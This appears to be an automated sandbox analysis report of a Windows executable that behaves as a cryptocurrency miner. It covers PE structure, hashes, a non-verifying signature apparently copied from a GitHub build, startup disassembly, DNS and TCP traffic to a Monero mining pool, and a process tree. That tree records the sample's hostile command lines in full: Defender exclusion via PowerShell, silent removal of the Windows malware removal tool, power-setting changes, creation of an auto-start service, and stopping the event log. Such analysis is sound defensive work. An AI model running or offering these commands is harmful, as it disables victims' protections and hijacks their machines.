                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 6.65718591723034
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: WWhhc3A0rs.exe
File size: 2'729'064 bytes (0x29a468)
MD5: 5df14b213736e361758fec790bd16721
SHA1: 019592d0ea29dd3037d8b0bd1bd65644aa02c74a
SHA256: 197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f
SHA512: 013a759a1f6d92581d5575ef0263d95442ff1f21c74b9a9e2853a07154472c6090753ee628bd75bd0e99142d733bd0a0c354a1099b4f2f8bd2447534363272fe
SSDEEP: 49152:y4TML4f/rWRrZExL3Ge+K8sfIZVFmWQTaMKcfMwNX8BkgE:df/rWRN0L3Ge+xAIgWU9KcfMsX8G
TLSH: 3BC53399016523B0D83EE47277C6FDF7AD9E33C193A894E34BAA40A59840FC4F53A593
                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...pJ.g.........."......z....(.....@..........@..............................)...........`........................................
                                                      Icon Hash:177154d6c64c2917
Entrypoint: 0x140001140
Entrypoint Section: .text
Digitally signed: true (an Authenticode signature block is attached to the file; it does not verify, see Signature Valid below)
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x670B4A70 [Sun Oct 13 04:20:00 2024 UTC]
TLS Callbacks: 0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version: (none; native code)
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: de41d4e0545d977de6ca665131bb479a
Signature Valid: false
Signature Issuer: CN=Microsoft ID Verified CS AOC CA 01, O=Microsoft Corporation, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the digest carried inside the PKCS#7 SignedData does not match the file's contents, so the certificate chain never comes into play; either the file was modified after signing or the signature block was copied from another file)
Not Before, Not After:
• 03/10/2024 07:22:21, 06/10/2024 07:22:21 (read as DD/MM/YYYY this is 3 to 6 October 2024, the three-day validity of the short-lived certificates Microsoft's Trusted Signing "ID Verified CS AOC" CAs issue; the PE time stamp above, 13 October 2024, falls after the certificate expired, which fits a signature block lifted from an earlier, legitimately signed GitHub build rather than a signature made over this file)
Subject Chain:
• CN="GitHub, Inc.", O="GitHub, Inc.", L=San Francisco, S=California, C=US
Version: 3
Thumbprint MD5: 79CD4E87A2ED4A09F9F871A8021CFED4
Thumbprint SHA-1: 6CAACC602454BCC06C78DEC8C948A91FBCB5A74B
Thumbprint SHA-256: 9EA57460428392B3511EFB7BB2938EEC44BEA792AF9361525F2A6C972460CA41
Serial: 3300019992904E2ADF1942F17C000000019992
Instruction (disassembly at the entrypoint 0x140001140). The report's listing decoded this x86-64 code as 32-bit, so every `dec eax` (0x48 = REX.W), `inc ecx` (0x41 = REX.B) and `dec esp` (0x4C = REX.WR) it prints is a REX prefix belonging to the next instruction, and the absolute `[disp32]` operands are RIP-relative. Re-decoded as x86-64 below, keeping the report's relative call/jump targets. The code is ordinary C-runtime startup: the entry stub sets a global and calls the real start routine, which spins on a compare-exchange startup lock, calling an imported function with argument 1000 between attempts (Sleep(1000) in the CRT source), and aborts with code 31 if initialization is re-entered. This matches the startup-lock loop of mingw-w64's crtexe.c, where the lock owner is the thread's TEB.StackBase read through gs:[30h] (a segment override the report's listing does not print, likewise the lock prefix on the compare-exchange). Nothing miner-specific is visible at the entrypoint.
sub rsp, 28h
mov rax, qword ptr [rip+00007ED5h]
mov dword ptr [rax], 00000001h
call 00007F86E083CBBFh
nop
nop
nop
add rsp, 28h
ret
nop
push r15
push r14
push rsi
push rdi
push rbx
sub rsp, 20h
mov rax, qword ptr [00000030h]
mov rdi, qword ptr [rax+08h]
mov rsi, qword ptr [rip+00007EC9h]
xor eax, eax
cmpxchg qword ptr [rsi], rdi
sete bl
je 00007F86E083CBE0h
cmp rdi, rax
je 00007F86E083CBDBh
mov r14, qword ptr [rip+00009679h]
nop word ptr [rax+rax+00000000h]
mov ecx, 000003E8h
call r14
xor eax, eax
cmpxchg qword ptr [rsi], rdi
sete bl
je 00007F86E083CBB7h
cmp rdi, rax
jne 00007F86E083CB99h
mov rdi, qword ptr [rip+00007E90h]
mov eax, dword ptr [rdi]
cmp eax, 01h
jne 00007F86E083CBBEh
mov ecx, 0000001Fh
call 00007F86E0844144h
jmp 00007F86E083CBD9h
cmp dword ptr [rdi], 00000000h
je 00007F86E083CBBBh
mov byte ptr [rip+002865A9h], 01h
jmp 00007F86E083CBCBh
mov dword ptr [rdi], 00000001h
mov rcx, qword ptr [rip+00007E7Ah]
mov rdx, qword ptr [rip+00007E7Bh]
call 00007F86E084413Bh
mov eax, dword ptr [rdi]
cmp eax, 01h
jne 00007F86E083CBCBh
mov rcx, qword ptr [rip+00007E50h]
Name | Virtual address | Virtual size | Is in section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa548 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28c000 | 0xfcd8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x289000 | 0x180 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x296a00 | 0x3a68 | .rsrc (as printed by the report; see note)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x29c000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x90a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa6e0 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Note: the SECURITY entry is the one data directory whose address is a file offset, not an RVA; the report's ".rsrc" comes from treating 0x296a00 as an RVA. As a file offset, 0x296a00 + 0x3a68 = 0x29a468 = 2'729'064, exactly the file size, so the Authenticode blob is the last 14'952 bytes of the file, appended after the .reloc section. No DEBUG directory (no PDB path) and no COM descriptor (native code, no .NET).
                                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                       .text | 0x1000 | 0x78e6 | 0x7a00 | 02d9eac2aeec3f5089af7c91588488e8 | False | 0.5074923155737705 | data | 6.15338975525263 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                       .rdata | 0x9000 | 0x1c90 | 0x1e00 | 604ac66a15dde83abd5b83d78c2407a2 | False | 0.4466145833333333 | zlib compressed data | 4.610968485507608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .data | 0xb000 | 0x27d650 | 0x27c800 | b03b3d47de185156856bf68768a01895 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                       .pdata | 0x289000 | 0x180 | 0x200 | fa0f9ca74a64e648e850696ac8b97d8a | False | 0.505859375 | data | 3.1320443954396437 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .00cfg | 0x28a000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .tls | 0x28b000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                       .rsrc | 0x28c000 | 0xfcd8 | 0xfe00 | f16f8ef5830a5c5dfad39c582975d9c7 | False | 0.8178364911417323 | data | 7.496335100492163 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .reloc | 0x29c000 | 0x78 | 0x200 | c58837d4ba072667d349e147cbd7531a | False | 0.2265625 | data | 1.4154353229231451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                       RT_ICON | 0x28c160 | 0x828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | English | United States | 0.019636015325670497
                                                       RT_ICON | 0x28c988 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | English | United States | 0.6631205673758865
                                                       RT_ICON | 0x28cdf0 | 0xb846 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9992156696485353
                                                       RT_ICON | 0x298638 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | English | United States | 0.42166979362101314
                                                       RT_ICON | 0x2996e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | English | United States | 0.3296680497925311
                                                       RT_GROUP_ICON | 0x29bc88 | 0x4c | data | English | United States | 0.7894736842105263
                                                       DLL | Import
                                                       msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                       KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                       Language of compilation system | Country where language is spoken | Map
                                                       English | United States |
                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Oct 13, 2024 19:10:05.166187048 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:05.171225071 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:05.171283960 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:05.171539068 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:05.176377058 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:05.782062054 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:05.782121897 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:05.782258034 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:05.782938004 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:05.787861109 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:05.959321022 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:06.004332066 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:06.092139006 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:06.144956112 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:15.647780895 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:15.691761017 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:20.427884102 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:20.488625050 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:30.451277971 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:30.676058054 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:36.519984961 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:36.660599947 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:46.584836960 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:46.691725016 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:10:56.415402889 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:10:56.488476992 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:06.502463102 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:06.675883055 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:16.728579044 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:16.852247953 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:26.531960011 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:26.675842047 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:36.651371002 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:36.785264969 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:39.720444918 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:39.725729942 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:39.905123949 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:39.961898088 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:46.531953096 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:46.675685883 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:11:56.532612085 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:11:56.691246986 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Oct 13, 2024 19:12:06.670816898 CEST | 10343 | 49713 | 51.15.65.182 | 192.168.2.6
                                                       Oct 13, 2024 19:12:06.722445965 CEST | 49713 | 10343 | 192.168.2.6 | 51.15.65.182
                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Oct 13, 2024 19:10:05.154194117 CEST | 63204 | 53 | 192.168.2.6 | 1.1.1.1
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 53 | 63204 | 1.1.1.1 | 192.168.2.6
                                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                       Oct 13, 2024 19:10:05.154194117 CEST | 192.168.2.6 | 1.1.1.1 | 0x8f5e | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
                                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 51.15.193.130 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 54.37.232.103 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 146.59.154.106 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 162.19.224.121 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 54.37.137.114 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 141.94.23.83 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 163.172.154.142 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 51.89.23.91 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001) | false
                                                       Oct 13, 2024 19:10:05.162425995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8f5e | No error (0) | xmr-eu1.nanopool.org | | 212.47.253.124 | A (IP address) | IN (0x0001) | false

                                                      Target ID:0
                                                      Start time:13:09:58
                                                      Start date:13/10/2024
                                                      Path:C:\Users\user\Desktop\WWhhc3A0rs.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\WWhhc3A0rs.exe"
                                                      Imagebase:0x7ff71eb10000
                                                      File size:2'729'064 bytes
                                                      MD5 hash:5DF14B213736E361758FEC790BD16721
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:13:09:58
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:13:09:58
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e40d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "VKWMZEFB"
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6b1b50000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto"
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "VKWMZEFB"
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
